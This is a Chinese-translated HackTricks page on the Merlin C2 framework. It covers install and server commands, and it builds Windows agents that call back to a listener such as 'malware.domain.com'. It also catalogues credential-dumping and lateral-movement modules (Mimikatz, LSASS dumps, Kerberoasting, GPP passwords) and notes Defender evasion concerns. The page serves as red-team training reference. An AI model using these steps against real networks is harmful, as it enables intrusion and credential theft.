hacktricks/backdoors/merlin.md

6.6 KiB
Raw Blame History

从零开始学习AWS黑客技术成为专家使用 htARTEHackTricks AWS红队专家

其他支持HackTricks的方式

安装

安装GO

#Download GO package from: https://golang.org/dl/
#Decompress the packe using:
tar -C /usr/local -xzf go$VERSION.$OS-$ARCH.tar.gz

#Change /etc/profile
Add ":/usr/local/go/bin" to PATH
Add "export GOPATH=$HOME/go"
Add "export GOBIN=$GOPATH/bin"

source /etc/profile

安装 Merlin

go get https://github.com/Ne0nd0g/merlin/tree/dev #It is recommended to use the developer branch
cd $GOPATH/src/github.com/Ne0nd0g/merlin/

启动 Merlin 服务器

go run cmd/merlinserver/main.go -i

Merlin 代理

您可以下载预编译代理

编译代理

转到主文件夹 $GOPATH/src/github.com/Ne0nd0g/merlin/

#User URL param to set the listener URL
make #Server and Agents of all
make windows #Server and Agents for Windows
make windows-agent URL=https://malware.domain.com:443/ #Agent for windows (arm, dll, linux, darwin, javascript, mips)

手动编译代理程序

GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://10.2.0.5:443" -o agent.exe main.g

模块

坏消息是Merlin使用的每个模块都是从源Github下载并保存在磁盘上才能使用。在使用知名模块时要小心因为Windows Defender会抓到你

SafetyKatz --> 修改版的Mimikatz。将LSASS转储到文件并运行:sekurlsa::logonpasswords到该文件
SharpDump --> 为指定的进程ID进行minidump默认为LSASS最终文件的扩展名是.gz但实际上是.bin是一个gz文件
SharpRoast --> Kerberoast不起作用
SeatBelt --> 在CS中进行本地安全测试不起作用https://github.com/GhostPack/Seatbelt/blob/master/Seatbelt/Program.cs
Compiler-CSharp --> 使用csc.exe /unsafe进行编译
Sharp-Up --> 在powerup中使用C#进行所有检查(有效)
Inveigh --> PowerShellADIDNS/LLMNR/mDNS/NBNS欺骗器和中间人工具不起作用需要加载https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1
Invoke-InternalMonologue --> 模拟所有可用用户并为每个用户检索挑战-响应每个用户的NTLM哈希坏的URL
Invoke-PowerThIEf --> 从IExplorer窃取表单或使其执行JS或在该进程中注入DLL不起作用PS似乎也不起作用https://github.com/nettitude/Invoke-PowerThIEf/blob/master/Invoke-PowerThIEf.ps1
LaZagneForensic --> 获取浏览器密码(有效,但不打印输出目录)
dumpCredStore --> Win32凭据管理器APIhttps://github.com/zetlen/clortho/blob/master/CredMan.ps1https://www.digitalcitizen.life/credential-manager-where-windows-stores-passwords-other-login-details
Get-InjectedThread --> 检测运行进程中的经典注入经典注入OpenProcessVirtualAllocExWriteProcessMemoryCreateRemoteThread不起作用
Get-OSTokenInformation --> 获取正在运行的进程和线程的令牌信息(用户、组、特权、所有者... https://docs.microsoft.com/es-es/windows/desktop/api/winnt/ne-winnt-_token_information_class
Invoke-DCOM --> 通过DCOM执行命令在其他计算机上http://www.enigma0x3.net.https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/
Invoke-DCOMPowerPointPivot --> 滥用PowerPoint COM对象ADDin在其他PC中执行命令
Invoke-ExcelMacroPivot --> 滥用Excel中的DCOM在其他PC中执行命令
Find-ComputersWithRemoteAccessPolicies -->(不起作用)(https://labs.mwrinfosecurity.com/blog/enumerating-remote-access-policies-through-gpo/
Grouper --> 它转储组策略的所有最有趣的部分然后在其中寻找可利用的内容已弃用看看Grouper2看起来非常好
Invoke-WMILM --> 使用WMI进行横向移动
Get-GPPPassword --> 查找groups.xmlscheduledtasks.xmlservices.xml和datasources.xml并返回明文密码在域内
Invoke-Mimikatz --> 使用mimikatz默认转储凭据
PowerUp --> https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
Find-BadPrivilege --> 检查计算机用户的特权
Find-PotentiallyCrackableAccounts --> 检索与SPN相关联的用户帐户的信息Kerberoasting
psgetsystem --> 获取系统

未检查持久性模块

简介

我真的很喜欢这个工具的感觉和潜力。
希望该工具开始从服务器下载模块并在下载脚本时集成某种逃避机制。

从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS Red Team Expert

支持HackTricks的其他方式